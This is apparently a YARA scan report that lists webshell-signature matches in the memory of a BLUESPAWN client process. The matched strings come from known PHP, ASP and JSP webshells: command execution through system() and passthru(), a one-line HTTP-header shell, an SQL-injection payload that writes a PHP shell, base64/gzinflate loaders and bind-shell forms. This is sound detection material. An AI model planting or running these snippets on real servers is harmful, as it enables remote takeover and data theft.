| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Worse_Linux_Shell | PHP Webshells Github Archive - file Worse Linux Shell.php | Florian Roth | - 0x306f73:$s4: if( $_POST['_act'] == "Upload!" ) {
- 0x306fa3:$s5: print "<center><h1>#worst @dal.net</h1></center>";
- 0x306fe2:$s7: print "<center><h1>Linux Shells</h1></center>";
- 0x30701e:$s8: $currentCMD = "ls -la";
- 0x307042:$s14: print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
- 0x30708c:$s19: $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_pHpINJ | PHP Webshells Github Archive - file pHpINJ.php | Florian Roth | - 0x3071fd:$s3: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x31cc1c:$s3: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x307248:$s10: <form action = "<?php echo "$_SERVER[PHP_SELF]" ; ?>" method = "post">
- 0x30729b:$s11: $sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN
- 0x35da19:$s11: $sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN
- 0x3072f6:$s13: Full server path to a writable file which will contain the Php Shell <br />
- 0x30734e:$s14: $expurl= $url."?id=".$sql ;
- 0x307376:$s15: <header>|| .::News PHP Shell Injection::. ||</header> <br /> <br />
- 0x3073ca:$s16: <input type = "submit" value = "Create Exploit"> <br /> <br />
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_NGH | PHP Webshells Github Archive - file NGH.php | Florian Roth | - 0x30753d:$s0: <title>Webcommander at <?=$_SERVER["HTTP_HOST"]?></title>
- 0x307583:$s2: /* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */
- 0x2f40a7:$s5: <form action=<?=$script?>?act=bindshell method=POST>
- 0x3075c9:$s5: <form action=<?=$script?>?act=bindshell method=POST>
- 0x30760a:$s9: <form action=<?=$script?>?act=backconnect method=POST>
- 0x30764d:$s11: <form action=<?=$script?>?act=mkdir method=POST>
- 0x30768a:$s16: die("<font color=#DF0000>Login error</font>");
- 0x3076c5:$s20: <b>Bind /bin/bash at port: </b><input type=text name=port size=8>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_matamu | PHP Webshells Github Archive - file matamu.php | Florian Roth | - 0x307841:$s2: $command .= ' -F';
- 0x307860:$s3: /* We try and match a cd command. */
- 0x307891:$s4: directory... Trust me - it works :-) */
- 0x30bfc3:$s4: directory... Trust me - it works :-) */
- 0x3078c5:$s5: $command .= " 1> $tmpfile 2>&1; " .
- 0x3078f5:$s10: $new_dir = $regs[1]; // 'cd /something/...'
- 0x30792d:$s16: /* The last / in work_dir were the first charecter.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_ru24_post_sh | PHP Webshells Github Archive - file ru24_post_sh.php | Florian Roth | - 0x307a99:$s1: http://www.ru24-team.net
- 0x2fc246:$s4: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x307abe:$s4: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x355988:$s4: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x35e05b:$s4: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x2fc20d:$s6: Ru24PostWebShell
- 0x307b18:$s6: Ru24PostWebShell
- 0x355959:$s6: Ru24PostWebShell
- 0x35e0ab:$s6: Ru24PostWebShell
- 0x2fc2a0:$s7: Writed by DreAmeRz
- 0x307b35:$s7: Writed by DreAmeRz
- 0x307b54:$s9: $function=passthru; // system, exec, cmd
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_hiddens_shell_v1 | PHP Webshells Github Archive - file hiddens shell v1.php | Florian Roth | - 0x2f9586:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x307cbd:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x3537a2:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x35e1ce:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_c99_madnet | PHP Webshells Github Archive - file c99_madnet.php | Florian Roth | - 0x307e42:$s0: $md5_pass = ""; //If no pass then hash
- 0x309c3d:$s0: $md5_pass = ""; //If no pass then hash
- 0x2e121b:$s1: eval(gzinflate(base64_decode('
- 0x2e263d:$s1: eval(gzinflate(base64_decode('
- 0x2f3b7b:$s1: eval(gzinflate(base64_decode('
- 0x2f54c3:$s1: eval(gzinflate(base64_decode('
- 0x307e75:$s1: eval(gzinflate(base64_decode('
- 0x309c70:$s1: eval(gzinflate(base64_decode('
- 0x342b7a:$s1: eval(gzinflate(base64_decode('
- 0x343912:$s1: eval(gzinflate(base64_decode('
- 0x34f3cd:$s1: eval(gzinflate(base64_decode('
- 0x3506b7:$s1: eval(gzinflate(base64_decode('
- 0x35e30e:$s1: eval(gzinflate(base64_decode('
- 0x35f97f:$s1: eval(gzinflate(base64_decode('
- 0x307ea0:$s2: $pass = "pass"; //Pass
- 0x307ec4:$s3: $login = "user"; //Login
- 0x307ee9:$s4: //Authentication
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_c99_locus7s | PHP Webshells Github Archive - file c99_locus7s.php | Florian Roth | - 0x30803d:$s8: $encoded = base64_encode(file_get_contents($d.$f));
- 0x30807e:$s9: $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y
- 0x35e481:$s9: $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y
- 0x3080d0:$s10: else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sq
- 0x35e4ca:$s10: else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sq
- 0x308122:$s11: $c99sh_sourcesurl = "http://locus7s.com/"; //Sources-server
- 0x30816b:$s19: $nixpwdperpage = 100; // Get first N lines from /etc/passwd
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_JspWebshell_1_2 | PHP Webshells Github Archive - file JspWebshell_1.2.php | Florian Roth | - 0x3082e6:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x30c63d:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x30832d:$s1: String password=request.getParameter("password");
- 0x30836b:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x30c684:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x35e6d1:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x361976:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x3083c3:$s7: String editfile=request.getParameter("editfile");
- 0x308401:$s8: //String tempfilename=request.getParameter("file");
- 0x2ea427:$s12: password = (String)session.getAttribute("password");
- 0x308441:$s12: password = (String)session.getAttribute("password");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_safe0ver | PHP Webshells Github Archive - file safe0ver.php | Florian Roth | - 0x3085a6:$s3: $scriptident = "$scriptTitle By Evilc0der.com";
- 0x3085e2:$s4: while (file_exists("$lastdir/newfile$i.txt"))
- 0x30861c:$s5: else { /* Then it must be a File... --> */
- 0x308658:$s7: $contents .= htmlentities( $line ) ;
- 0x308689:$s8: <br><p><br>Safe Mode ByPAss<p><form method="POST">
- 0x3086c8:$s14: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x30fdfa:$s14: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x308711:$s20: /* End of Actions --> */
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Uploader | PHP Webshells Github Archive - file Uploader.php | Florian Roth | - 0x2f57d2:$s1: move_uploaded_file($userfile, "entrika.php");
- 0x30885f:$s1: move_uploaded_file($userfile, "entrika.php");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_kral | PHP Webshells Github Archive - file kral.php | Florian Roth | - 0x3089c4:$s1: $adres=gethostbyname($ip);
- 0x3089eb:$s3: curl_setopt($ch,CURLOPT_POSTFIELDS,"domain=".$site);
- 0x308a2c:$s4: $ekle="/index.php?option=com_user&view=reset&layout=confirm";
- 0x308a76:$s16: echo $son.' <br> <font color="green">Access</font><br>';
- 0x308abb:$s17: <p>kodlama by <a href="mailto:priv8coder@gmail.com">BLaSTER</a><br /
- 0x35ec5a:$s17: <p>kodlama by <a href="mailto:priv8coder@gmail.com">BLaSTER</a><br /
- 0x308b0c:$s20: <p><strong>Server listeleyici</strong><br />
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_cgitelnet | PHP Webshells Github Archive - file cgitelnet.php | Florian Roth | - 0x308c6b:$s9: # Author Homepage: http://www.rohitab.com/
- 0x308ca2:$s10: elsif($Action eq "command") # user wants to run a command
- 0x308ce8:$s18: # in a command line on Windows NT.
- 0x308d17:$s20: print "Transfered $TargetFileSize Bytes.<br>";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_simple_backdoor | PHP Webshells Github Archive - file simple-backdoor.php | Florian Roth | - 0x2f734e:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x308e84:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x3097c9:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x308ecb:$s1: http://michaeldaw.org 2006 -->
- 0x309810:$s1: http://michaeldaw.org 2006 -->
- 0x2f7395:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x308f03:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x309848:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x308f50:$s3: echo "</pre>";
- 0x308f73:$s4: $cmd = ($_REQUEST['cmd']);
- 0x308fa2:$s5: echo "<pre>";
- 0x2dec71:$s6: if(isset($_REQUEST['cmd'])){
- 0x308fc4:$s6: if(isset($_REQUEST['cmd'])){
- 0x309895:$s6: if(isset($_REQUEST['cmd'])){
- 0x308fed:$s7: die;
- 0x309006:$s8: system($cmd);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_2 | PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php | Florian Roth | - 0x30675a:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x30918e:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x3091cf:$s3: xb5@hotmail.com</FONT></CENTER></B>");
- 0x309202:$s4: $v = @ini_get("open_basedir");
- 0x30679b:$s6: by PHP Emperor<xb5@hotmail.com>
- 0x30922d:$s6: by PHP Emperor<xb5@hotmail.com>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_NTDaddy_v1_9 | PHP Webshells Github Archive - file NTDaddy v1.9.php | Florian Roth | - 0x309385:$s2: | -obzerve : mr_o@ihateclowns.com |
- 0x3093b9:$s6: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x309e29:$s6: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x3093f2:$s13: <form action=ntdaddy.asp method=post>
- 0x309424:$s17: response.write("<ERROR: THIS IS NOT A TEXT FILE>")
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_lamashell | PHP Webshells Github Archive - file lamashell.php | Florian Roth | - 0x309589:$s0: if(($_POST['exe']) == "Execute") {
- 0x3095b8:$s8: $curcmd = $_POST['king'];
- 0x3095de:$s16: "http://www.w3.org/TR/html4/loose.dtd">
- 0x309612:$s18: <title>lama's'hell v. 3.0</title>
- 0x309640:$s19: _|_ O _ O _|_
- 0x309662:$s20: $curcmd = "ls -lah";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Simple_PHP_backdoor_by_DK | PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php | Florian Roth | - 0x2f734e:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x308e84:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x3097c9:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x308ecb:$s1: http://michaeldaw.org 2006 -->
- 0x309810:$s1: http://michaeldaw.org 2006 -->
- 0x2f7395:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x308f03:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x309848:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x2dec71:$s6: if(isset($_REQUEST['cmd'])){
- 0x308fc4:$s6: if(isset($_REQUEST['cmd'])){
- 0x309895:$s6: if(isset($_REQUEST['cmd'])){
- 0x2dec9a:$s8: system($cmd);
- 0x30900e:$s8: system($cmd);
- 0x3098be:$s8: system($cmd);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Moroccan_Spamers_Ma_EditioN_By_GhOsT | PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php | Florian Roth | - 0x309a34:$s4: $content = chunk_split(base64_encode($content));
- 0x309a72:$s12: print "Sending mail to $to....... ";
- 0x309aa4:$s16: if (!$from && !$subject && !$message && !$emaillist){
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_C99madShell_v__2_0_madnet_edition | PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php | Florian Roth | - 0x307e42:$s0: $md5_pass = ""; //If no pass then hash
- 0x309c3d:$s0: $md5_pass = ""; //If no pass then hash
- 0x2e121b:$s1: eval(gzinflate(base64_decode('
- 0x2e263d:$s1: eval(gzinflate(base64_decode('
- 0x2f3b7b:$s1: eval(gzinflate(base64_decode('
- 0x2f54c3:$s1: eval(gzinflate(base64_decode('
- 0x307e75:$s1: eval(gzinflate(base64_decode('
- 0x309c70:$s1: eval(gzinflate(base64_decode('
- 0x342b7a:$s1: eval(gzinflate(base64_decode('
- 0x343912:$s1: eval(gzinflate(base64_decode('
- 0x34f3cd:$s1: eval(gzinflate(base64_decode('
- 0x3506b7:$s1: eval(gzinflate(base64_decode('
- 0x35e30e:$s1: eval(gzinflate(base64_decode('
- 0x35f97f:$s1: eval(gzinflate(base64_decode('
- 0x309c9b:$s2: $pass = ""; //Pass
- 0x309cbb:$s3: $login = ""; //Login
- 0x2e2609:$s4: //Authentication
- 0x307ef6:$s4: //Authentication
- 0x309cdc:$s4: //Authentication
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_CmdAsp_asp_php | PHP Webshells Github Archive - file CmdAsp.asp.php.txt | Florian Roth | - 0x3093b9:$s1: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x309e29:$s1: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x309e62:$s4: ' Author: Maceo <maceo @ dogmile.com>
- 0x309e94:$s5: ' -- Use a poor man's pipe ... a temp file -- '
- 0x309ed0:$s6: ' --------------------o0o--------------------
- 0x309f0a:$s8: ' File: CmdAsp.asp
- 0x309f29:$s11: <-- CmdAsp.asp -->
- 0x2d6463:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x2e1dcd:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x309f48:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x314eeb:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x31720f:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x309f9b:$s16: Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
- 0x2d63c8:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2dc850:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2e1d7f:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x309fdf:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x3171c1:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_NCC_Shell | PHP Webshells Github Archive - file NCC-Shell.php | Florian Roth | - 0x30a153:$s0: if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {
- 0x30a19f:$s1: <b>--Coded by Silver
- 0x30a1c0:$s2: <title>Upload - Shell/Datei</title>
- 0x30a1f0:$s8: <a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b><
- 0x35fd9b:$s8: <a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b><
- 0x30a249:$s14: ~|_Team .:National Cracker Crew:._|~<br>
- 0x30a27e:$s18: printf("Sie ist %u Bytes gro
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_README | PHP Webshells Github Archive - file README.md | Florian Roth | - 0x30a3d4:$s0: Common php webshells. Do not host the file(s) in your server!
- 0x30a41e:$s1: php-webshells
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_backupsql | PHP Webshells Github Archive - file backupsql.php | Florian Roth | - 0x30a55e:$s0: $headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" .
- 0x360011:$s0: $headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" .
- 0x2f567f:$s1: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x30a5b4:$s1: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x350815:$s1: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x36005d:$s1: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x30a610:$s2: * as email attachment, or send to a remote ftp server by
- 0x30a655:$s16: * Neagu Mihai<neagumihai@hotmail.com>
- 0x30a687:$s17: $from = "Neu-Cool@email.com"; // Who should the emails be sent from?, may
- 0x360114:$s17: $from = "Neu-Cool@email.com"; // Who should the emails be sent from?, may
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_AK_74_Security_Team_Web_Shell_Beta_Version | PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php | Florian Roth | - 0x30a84a:$s8: - AK-74 Security Team Web Site: www.ak74-team.net
- 0x30a888:$s9: <b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'.
- 0x36029d:$s9: <b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'.
- 0x30a8e5:$s10: <b><font color=#83000>Execute system commands!</font></b>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_cpanel | PHP Webshells Github Archive - file cpanel.php | Florian Roth | - 0x30aa59:$s0: function ftp_check($host,$user,$pass,$timeout){
- 0x30aa95:$s3: curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
- 0x30aad5:$s4: [ user@alturks.com ]# info<b><br><font face=tahoma><br>
- 0x30ab19:$s12: curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
- 0x30ab4f:$s13: Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir
- 0x3604c7:$s13: Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir
- 0x30abac:$s20: <br><b>Please enter your USERNAME and PASSWORD to logon<br>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_accept_language | PHP Webshells Github Archive - file accept_language.php | Florian Roth | - 0x30ad26:$s0: <?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_529 | PHP Webshells Github Archive - file 529.php | Florian Roth | - 0x30aea6:$s0: <p>More: <a href="/">Md5Cracking.Com Crew</a>
- 0x30aee1:$s7: href="/" title="Securityhouse">Security House - Shell Center - Edited By Kin
- 0x36076a:$s7: href="/" title="Securityhouse">Security House - Shell Center - Edited By Kin
- 0x30af3a:$s9: echo '<PRE><P>This is exploit from <a
- 0x30af6d:$s10: This Exploit Was Edited By KingDefacer
- 0x30afa0:$s13: safe_mode and open_basedir Bypass PHP 5.2.9
- 0x30afd9:$s14: $hardstyle = explode("/", $file);
- 0x30b008:$s20: while($level--) chdir("..");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_STNC_WebShell_v0_8 | PHP Webshells Github Archive - file STNC WebShell v0.8.php | Florian Roth | - 0x30b16a:$s3: if(isset($_POST["action"])) $action = $_POST["action"];
- 0x30b1ae:$s8: elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()
- 0x360991:$s8: elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()
- 0x30b209:$s13: { $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pw
- 0x3609e3:$s13: { $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pw
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_tryag | PHP Webshells Github Archive - file tryag.php | Florian Roth | - 0x30b38e:$s1: <title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>
- 0x30b3d8:$s3: $tabledump = "DROP TABLE IF EXISTS $table;\n";
- 0x30b414:$s6: $string = !empty($_POST['string']) ? $_POST['string'] : 0;
- 0x30b45c:$s7: $tabledump .= "CREATE TABLE $table (\n";
- 0x30b492:$s14: echo "<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE
- 0x360bd7:$s14: echo "<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_dC3_Security_Crew_Shell_PRiV_2 | PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php | Florian Roth | - 0x304325:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x30b63c:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x30b681:$s9: header("Last-Modified: ".date("r",filemtime(__FILE__)));
- 0x30b6c6:$s13: header("Content-type: image/gif");
- 0x30b6f5:$s14: @copy($file,$to) or die ("[-]Error copying file!");
- 0x304466:$s20: if (isset($_GET['rename_all'])) {
- 0x30b735:$s20: if (isset($_GET['rename_all'])) {
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_qsd_php_backdoor | PHP Webshells Github Archive - file qsd-php-backdoor.php | Florian Roth | - 0x30b897:$s1: // A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c
- 0x360edb:$s1: // A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c
- 0x30b8f4:$s2: if(isset($_POST["newcontent"]))
- 0x30b920:$s3: foreach($parts as $val)//Assemble the path back together
- 0x30b965:$s7: $_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"]));
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_spygrup | PHP Webshells Github Archive - file spygrup.php | Florian Roth | - 0x30bae6:$s2: kingdefacer@msn.com</FONT></CENTER></B>");
- 0x30bb1d:$s6: if($_POST['root']) $root = $_POST['root'];
- 0x30bb54:$s12: ".htmlspecialchars($file)." Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>
- 0x30bbaf:$s18: By KingDefacer From Spygrup.org>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Web_shell__c_ShAnKaR | PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php | Florian Roth | - 0x30bd18:$s0: header("Content-Length: ".filesize($_POST['downf']));
- 0x30bd5a:$s5: if($_POST['save']==0){echo "<textarea cols=70 rows=10>".htmlspecialchars($dump
- 0x36127e:$s5: if($_POST['save']==0){echo "<textarea cols=70 rows=10>".htmlspecialchars($dump
- 0x30bdb5:$s6: write("#\n#Server : ".getenv('SERVER_NAME')."
- 0x30bdef:$s12: foreach(@file($_POST['passwd']) as $fed)echo $fed;
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz | PHP Webshells Github Archive - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.php | Florian Roth | - 0x30bf88:$s7: <meta name="Copyright" content=TouCh By iJOo">
- 0x307891:$s11: directory... Trust me - it works :-) */
- 0x30bfc3:$s11: directory... Trust me - it works :-) */
- 0x30bff7:$s15: /* ls looks much better with ' -F', IMHO. */
- 0x30c030:$s16: } else if ($command == 'ls') {
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Gamma_Web_Shell | PHP Webshells Github Archive - file Gamma Web Shell.php | Florian Roth | - 0x30c18d:$s4: $ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];
- 0x30c1ca:$s8: ### Gamma Group <http://www.gammacenter.com>
- 0x30c203:$s15: my $error = "This command is not available in the restricted mode.\n";
- 0x30c256:$s20: my $command = $self->query('command');
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_aspydrv | PHP Webshells Github Archive - file aspydrv.php | Florian Roth | - 0x30c3b9:$s0: Target = "D:\hshome\masterhr\masterhr.com\" ' ---Directory to which files
- 0x361749:$s0: Target = "D:\hshome\masterhr\masterhr.com\" ' ---Directory to which files
- 0x30c410:$s1: nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
- 0x30c459:$s3: Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1
- 0x30c4a3:$s17: If request.querystring("getDRVs")="@" then
- 0x30c4da:$s20: ' ---Copy Too Folder routine Start
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_JspWebshell_1_2_2 | PHP Webshells Github Archive - file JspWebshell 1.2.php | Florian Roth | - 0x3082e6:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x30c63d:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x30836b:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x30c684:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x35e6d1:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x361976:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x30c6dc:$s4: // String tempfilepath=request.getParameter("filepath");
- 0x30c721:$s15: endPoint=random1.getFilePointer();
- 0x30c750:$s20: if (request.getParameter("command") != null) {
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_g00nshell_v1_3 | PHP Webshells Github Archive - file g00nshell-v1.3.php | Florian Roth | - 0x30c8bb:$s10: #To execute commands, simply include ?cmd=___ in the url. #
- 0x30c903:$s15: $query = "SHOW COLUMNS FROM " . $_GET['table'];
- 0x30c93f:$s16: $uakey = "724ea055b975621b9d679f7077257bd9"; // MD5 encoded user-agent
- 0x30c992:$s17: echo("<form method='GET' name='shell'>");
- 0x30c9c8:$s18: echo("<form method='post' action='?act=sql'>");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_WinX_Shell | PHP Webshells Github Archive - file WinX Shell.php | Florian Roth | - 0x30cb2c:$s4: // It's simple shell for all Win OS.
- 0x30cb5d:$s5: //------- [netstat -an] and [ipconfig] and [tasklist] ------------
- 0x30cbac:$s6: <html><head><title>-:[GreenwooD]:- WinX Shell</title></head>
- 0x30cbf5:$s13: // Created by greenwood from n57
- 0x30cc22:$s20: if (is_uploaded_file($userfile)) {
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_PHANTASMA | PHP Webshells Github Archive - file PHANTASMA.php | Florian Roth | - 0x30cd78:$s12: " printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
- 0x30cdbf:$s15: if ($portscan != "") {
- 0x30cde2:$s16: echo "<br>Banner: $get <br><br>";
- 0x30ce10:$s20: $dono = get_current_user( );
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_cw | PHP Webshells Github Archive - file cw.php | Florian Roth | - 0x30cf5f:$s1: // Dump Database [pacucci.com]
- 0x30cf8a:$s2: $dump = "-- Database: ".$_POST['db'] ." \n";
